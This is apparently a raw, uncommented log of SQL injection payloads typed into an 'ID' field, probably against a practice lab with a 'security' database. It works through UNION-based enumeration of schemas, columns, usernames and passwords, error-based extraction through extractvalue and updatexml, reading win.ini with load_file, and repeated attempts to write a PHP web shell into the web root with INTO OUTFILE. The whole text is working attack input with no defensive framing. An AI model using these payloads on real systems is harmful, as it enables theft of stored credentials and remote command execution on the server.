ID:12
ID:12'-- 
ID:12')-- 
ID:12') UNION SELECT 1,1,1-- 
ID:0') UNION SELECT 1,1,1-- 
ID:0') UNION SELECT 1,1,group_concat(schema_name) from information_schema.schemata--
ID:0') UNION SELECT 1,1,group_concat(schema_name) from information_schema.schemata-- 
ID:0') UNION SELECT 1,1,group_concat(*) from information_schema.columns WHERE table_name = 'security'-- 
ID:0') UNION SELECT 1,1,* from information_schema.columns WHERE table_name = 'security'-- 
ID:0') UNION SELECT 1,1,1 from information_schema.columns WHERE table_name = 'security'-- 
ID:0') UNION SELECT 1,username,1 from information_schema.columns WHERE table_name = 'security'-- 
ID:0') UNION SELECT 1,username,1 from information_schema.columns WHERE table_name = 'users'-- 
ID:0') UNION SELECT 1,username,1 from information_schema.columns WHERE table_name = 'security'-- 
ID:0') UNION SELECT 1,1,1 from information_schema.columns WHERE table_name = 'users'-- 
ID:0') UNION SELECT 1,1,password from information_schema.columns WHERE table_name = 'users'-- 
ID:0') UNION SELECT id,1,password from users-- 
ID:0') UNION SELECT id,1,password from users where id=2-- 
ID:0') UNION SELECT id,username,password from users where id=2-- 
ID:0') UNION SELECT 1,1,column_name from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 1-- 
ID:0') UNION SELECT 1,1,column_name from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 2-- 
ID:0') UNION SELECT 1,1,column_name from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 3-- 
ID:0') UNION SELECT 1,1,column_name from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 2-- 
ID:0') UNION SELECT 1,1,column_name from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 4-- 
ID:0') UNION SELECT 1,1,column_name from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 1-- 
ID:0') UNION SELECT 1,column_name,1 from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 2-- 
ID:0') UNION SELECT 1,column_name,1 from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 3-- 
ID:0') UNION SELECT 1,column_name,1 from information_schema.columns where table_schema='security' AND table_name='users' ORDER BY 1-- 
ID:1
ID:1')-- 
ID:0 union select 1,2,3-- 
ID:abcd
ID:12
ID:12
ID:1
ID:
ID:
ID:''
ID:''
ID:1') and extractvalue(1, concat(0x7e,version()))-- 
ID:1') and extractvalue(1, concat(0x7e,version()))-- 
ID:1') and extractvalue(1, concat(0x7e,(select load_file('C:\\\\Windows\\\\win.ini'))))-- 
ID:1') and extractvalue(1, concat(0x7e,(SELECT "<?php system($_GET['cmd']); ?>",2,3 INTO OUTFILE 'C:/wamp64/www/shell.php'))))-- 
ID:1') and extractvalue(1, concat(0x7e,(SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/wamp64/www/shell.php'))))-- 
ID:1') and extractvalue(1, concat(0x7e,(SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/wamp64/www/shell.php'))))-- 
ID:1') UNION (select "SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/wamp64/www/shell.php")-- 
ID:1') UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/wamp64/www/shell.php'-- 
ID:1') UNION SELECT "<?php system($_GET['cmd']); ?>",1,1 INTO OUTFILE 'C:/wamp64/www/shell.php'-- 
ID:1') UNION SELECT "<?php system($_GET['cmd']); ?>",1,1 INTO OUTFILE 'C:/wamp64/www/shell.php'-- 
ID:4') UNION SELECT "<?php system($_GET['cmd']); ?>",1,1 INTO OUTFILE 'C:/wamp64/www/shell.php'-- 
ID:4") UNION SELECT "<?php system($_GET['cmd']); ?>",1,1 INTO OUTFILE 'C:/wamp64/www/shell.php'-- 
ID:4') UNION SELECT "<?php system($_GET['cmd']); ?>",1,1 INTO OUTFILE 'C:/wamp64/www/shell.php'-- 
ID:1') or updatexml(1,concat(0x7e,(select group_concat(user,0x7e,file_priv,0x7e) from mysql.user),0x7e),1)
ID:1') and updatexml(1,concat(0x7e,(select group_concat(user,0x7e,file_priv,0x7e) from mysql.user),0x7e),1)
ID:1') or extractvalue(1,concat(0x7e,(select group_concat(user,0x7e,file_priv,0x7e) from mysql.user)))
ID:1') or extractvalue(1,concat(0x7e,(select group_concat(user,0x7e,file_priv,0x7e) from mysql.user)))-- 
